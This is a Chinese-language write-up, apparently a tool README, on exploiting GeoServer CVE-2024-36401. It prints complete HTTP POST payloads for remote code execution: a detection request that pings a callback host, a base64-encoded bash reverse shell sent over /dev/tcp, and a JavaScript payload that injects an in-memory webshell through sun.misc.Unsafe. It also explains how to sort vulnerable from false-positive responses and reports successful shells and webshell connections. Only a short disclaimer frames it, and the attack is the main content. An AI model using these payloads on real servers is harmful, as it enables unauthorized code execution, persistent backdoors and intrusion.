geoserver CVE-2024-36401 声明:仅用于授权测试,用户滥用造成的一切后果和作者无关 请遵守法律法规!
工具稍后放出
原本没打算写的,主要是想着直接去搜一下工具,直接用着方便就OK了
找到一个geoserver CVE-2024-36401漏洞利用工具
GeoServer 综合漏洞扫描工具V1.2 发布!
但是实际使用下来感觉到这个工具稍微有点Lk,作者说是go语言写的,速度极快,主要表现是两点
1、闪退,不明原因的闪退,检测都要闪退
2、使用yakit漏洞是存在的,但是他这个工具不存在,就没明白怎么回事,估计是他的判断逻辑上出了问题
那么就想着能不能自己写一个试试
但是发现这个漏洞实际写下来,也没那么简单
那个作者说新版发布了,最新的版本是GeoServer 综合漏洞扫描工具V1.2,实际上发现他的新版也还是那样Lk,原因在于,同样的站,他那个工具检测不到漏洞
换成自己写的就可以检测到漏洞
简单说一下编写思路吧
1,默认payload:
POST /geoserver/wfs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: / Connection: close Host: xxxx Accept-Language: en-US;q=0.9,en;q=0.8 Cache-Control: max-age=0 Content-Type: application/xml Content-Length: 356
](http://www.opengis.net/wfs/2.0'%3E) wfs:valueReferenceexec(java.lang.Runtime.getRuntime(),'ping wsn9.callback.red')[/wfs:valueReference](/wfs:valueReference) [/wfs:GetPropertyValue](/wfs:GetPropertyValue)
那么注意这里:
这个地方,如果你需要采取正则的方式去拿到,这个是sf:archsites网站的一个基本标识,你需要先拿到他的
wfs:ReturnFeatureType(.\*?)[/wfs:ReturnFeatureType](/wfs:ReturnFeatureType)信息,然后你可以采取拼接的方式
判断漏洞的时候 wfs:valueReferenceexec(java.lang.Runtime.getRuntime(),'ping wsn9.callback.red')[/wfs:valueReference](/wfs:valueReference)
这个地方,其实都不用去查找dns记录
简单的逻辑就是判断是否存在异常的类
如java.lang.ClassCastException
当然,这只是判断逻辑
这个回显本来就是400,这个地方容易踩坑,你需要判断错误页面后,进行数据查找
首先你需要请求一个 ](http://www.opengis.net/wfs/2.0'/%3E)
这个信息代表了你可以拿到他的wfs:ReturnFeatureType(.\*?)[/wfs:ReturnFeatureType](/wfs:ReturnFeatureType)
然后直接赋值给文本,然后再调一个函数方法,把文本的截取的信息,拼接到参数的这里
这条就会对判断的逻辑相对精准,检测类就这么写就可以了
如果你只是一直使用 ,那么误判的几率很高,会提示找不到这个sf:archsites
反弹类
我们看看反弹的payload:
POST /geoserver/wfs HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Cookie: JSESSIONID=5D030E92A0AFCC3B5006597E6524FD8D Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Content-Type: application/xml Content-Length: 438
](http://www.opengis.net/wfs/2.0'%3E) wfs:valueReferenceexec(java.lang.Runtime.getRuntime(),'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}')[/wfs:valueReference](/wfs:valueReference) [/wfs:GetPropertyValue](/wfs:GetPropertyValue)
我们注意这里:
同样,先要正则取值然后拼接给他
然后直接请求
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx这里是加密过的base64
编写的时候,就把用户输入的bash -i >& /dev/tcp/127.0.0.1/9999 0>&1,转换成base64就可以了
然后发请求,同样,去找关键的异常类,判断逻辑即可
内存马注入类 这个地方 POST /geoserver/wfs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: close Host: xxx Accept-Language: en-US;q=0.9,en;q=0.8 Cache-Control: max-age=0 Content-Type: application/xml Content-Length: 20383
](http://www.opengis.net/wfs/2.0'%3E) wfs:valueReferenceeval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),' var str=""; var bt; try { bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str); } catch (e) { bt = java.util.Base64.getDecoder().decode(str); } var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe"); theUnsafe.setAccessible(true); unsafe = theUnsafe.get(null); unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance(); ')[/wfs:valueReference](/wfs:valueReference) [/wfs:GetPropertyValue](/wfs:GetPropertyValue)
这个地方还是有 ,老规矩,先取值
在star这里,放入你生成的base64的内存马加密代码
然后判断逻辑即可
容易踩坑的点 1、 重复利用,误判几率98%,报错如下:
[https://geoserver.epic.blue/geoserver/schemas/ows/1.1.0/owsAll.xsd">](https://geoserver.epic.blue/geoserver/schemas/ows/1.1.0/owsAll.xsd%22%3E) ows:ExceptionTextCould not locate {[http://www.openplans.org/spearfish}archsites](http://www.openplans.org/spearfish%7Darchsites) in catalog.<
存在漏洞的点: ows:ExceptionTextjava.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.feature.type.AttributeDescriptor (java.lang.ProcessImpl is in module java.base of loader 'bootstrap'; org.opengis.feature.type.AttributeDescriptor is in unnamed module of loader org.apache.catalina.loader.ParallelWebappClassLoader @4b9df8a) class java.lang.ProcessImpl cannot be cast to class org.opengis.feature.type.AttributeDescriptor (java.lang.ProcessImpl is in module java.base of loader 'bootstrap'; org.opengis.feature.type.AttributeDescriptor is in unnamed module of loader org.apache.catalina.loader.ParallelWebappClassLoader @4b9df8a)[/ows:ExceptionText](/ows:ExceptionText) [/ows:Exception](/ows:Exception)
简单来讲存在漏洞就是java.lang.ClassCastException
误判就是Could not locate {[http://www.openplans.org/spearfish}archsites](http://www.openplans.org/spearfish%7Darchsites) in catalog
2、判断方式: 抓取调用的wfs:ReturnFeatureType>,赋给文本-文本调用函数方法,请求,拼接在请求,判断回显的异常
文本调用函数这里,需要提前给值,这样防止出现空指针异常,请求前拼接,判断回显的异常,是异常内进行判断
最终我们实现了这个漏洞利用工具的编写
[![image](https://github.com/MInggongK/geoserver-/raw/main/geoservers/dfdsfdf.png)](https://github.com/MInggongK/geoserver-/blob/main/geoservers/dfdsfdf.png)
我们来测试一下漏洞
工具执行效果
[![image](https://github.com/MInggongK/geoserver-/raw/main/geoservers/fgfggf.png)](https://github.com/MInggongK/geoserver-/blob/main/geoservers/fgfggf.png)
[![image](https://github.com/MInggongK/geoserver-/raw/main/geoservers/dfgdg.png)](https://github.com/MInggongK/geoserver-/blob/main/geoservers/dfgdg.png)
[![image](https://github.com/MInggongK/geoserver-/raw/main/geoservers/dsfsdfsd.png)](https://github.com/MInggongK/geoserver-/blob/main/geoservers/dsfsdfsd.png)
我们检测到了漏洞,拿到了端点,反弹shell也成功了
接下来我们来试试注入内存马
[![image](https://github.com/MInggongK/geoserver-/raw/main/geoservers/gfdgfdg.png)](https://github.com/MInggongK/geoserver-/blob/main/geoservers/gfdgfdg.png)
显示是成功注入内存马,我们来连接看看是否成功
[![image](https://github.com/MInggongK/geoserver-/raw/main/geoservers/fdgdgds.png)](https://github.com/MInggongK/geoserver-/blob/main/geoservers/fdgdgds.png)
是可以连接的